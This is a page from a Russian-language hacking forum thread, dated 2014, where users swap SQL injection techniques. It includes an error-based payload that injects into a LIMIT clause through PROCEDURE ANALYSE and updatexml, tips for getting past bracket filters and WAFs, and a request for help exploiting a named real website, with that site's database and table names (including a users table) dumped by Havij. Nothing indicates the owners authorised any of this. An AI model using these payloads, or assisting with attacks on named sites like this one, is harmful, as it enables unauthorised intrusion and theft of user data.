HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2359 из 2438 « Первая < 13591859225923092349 2355 2356 2357 2358 2359 2360 2361 2362 2363 23692409 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23581  
Старый 20.06.2014, 23:04
Unknown
Guest
Сообщений: n/a
Провел на форуме:
21918

Репутация: 6
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
никто не в курсе как через БД джомлы найти урл от сайта(кроме как искать сайт по контенту в БД), а то чёт ничего путёвого там ненахожу
Попробуй так:

Код:
Code:
SELECT name FROM #__menu LIMIT 0,1
 
Ответить с цитированием

  #23582  
Старый 20.06.2014, 23:29
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от int  
int said:
Попробуй так:
Код:
Code:
SELECT name FROM #__menu LIMIT 0,1
не, там только титлы
 
Ответить с цитированием

  #23583  
Старый 20.06.2014, 23:53
Unknown
Guest
Сообщений: n/a
Провел на форуме:
21918

Репутация: 6
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
не, там только титлы
А в колонке link?

SELECT link FROM #__menu
 
Ответить с цитированием

  #23584  
Старый 21.06.2014, 15:25
Unknown
Guest
Сообщений: n/a
Провел на форуме:
21918

Репутация: 6
По умолчанию
При фильтрации скобок в boolean based blind sql injection есть вектора?
 
Ответить с цитированием

  #23585  
Старый 21.06.2014, 15:38
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от int  
int said:
При фильтрации скобок в boolean based blind sql injection есть вектора?
Заготовок, которые можно подставить, нет. Раскрутить возможно.

Обычно используются конструкции с union select, where, regexp и case (blind sql-injection),.
 
Ответить с цитированием

  #23586  
Старый 21.06.2014, 21:19
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию
Цитата:
Сообщение от int  
int said:
При фильтрации скобок в boolean based blind sql injection есть вектора?
Если имеются ввиду эти скобки <> то блайнд с полным перебором только можно воспроизвести
 
Ответить с цитированием

  #23587  
Старый 21.06.2014, 22:15
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от XAMEHA  
XAMEHA said:
Заготовок, которые можно подставить, нет. Раскрутить возможно.
Обычно используются конструкции с union select, where, regexp и case (blind sql-injection),.
URL Encode и Double Url Encode забыл упомянуть.
 
Ответить с цитированием

  #23588  
Старый 22.06.2014, 00:12
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от int  
int said:
Как раскрутить такое:
Код:
Code:
SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit
где $limitstart, $limit - не фильтруются.
Новонайденный вектор:

Цитата:
Сообщение от None  
SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))
 
Ответить с цитированием

  #23589  
Старый 22.06.2014, 02:10
Unknown
Guest
Сообщений: n/a
Провел на форуме:
21918

Репутация: 6
По умолчанию
Цитата:
Сообщение от psihoz26  
psihoz26 said:
Если имеются ввиду эти скобки <> то блайнд с полным перебором только можно воспроизвести
Имел ввиду круглые, а не знак больше/меньше.

BigBear, пробовал - не проходит.

Цитата:
Сообщение от YaBtr  
YaBtr said:
Новонайденный вектор:
Спасибо!

Вдогонку спрошу: какие есть популярные WAF (или модули для joomla), которые режут все спец символы, но не трогают sql операторы. Хочу покопаться в исходниках.
 
Ответить с цитированием

  #23590  
Старый 22.06.2014, 21:24
Gulik
Новичок
Регистрация: 15.03.2007
Сообщений: 20
Провел на форуме:
133734

Репутация: 19
Отправить сообщение для Gulik с помощью ICQ
По умолчанию
Приветствую,

Помогите раскрутить иньекцию

Код:
Code:
http://sochi-h ome.com/objects/novostroyki.html?types=1
На странице две запроса с инъекцией, один видимо с использованием Count(*) поэтому подобрать кол=во полей пеполучается, но есть еще MySQL error based injection method

Через него из проги Havij получил ДБ и Таблицы

Код:
Code:
Current DB: urchenko_home

Table found: blocks
Table found: catalogcats
Table found: catalogitems
Table found: cats
Table found: content
Table found: forms
Table found: formsdata
Table found: formsfields
Table found: general
Table found: menu
Table found: menus
Table found: photos
Table found: photositems
Table found: poller
Table found: poller_option
Table found: poller_vote
Table found: ratings
Table found: responses
Table found: users
Но далее Havij идти не хочет и не выводит поля таблиц.
 
Ответить с цитированием
Ответ
Страница 2359 из 2438 « Первая < 13591859225923092349 2355 2356 2357 2358 2359 2360 2361 2362 2363 23692409 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ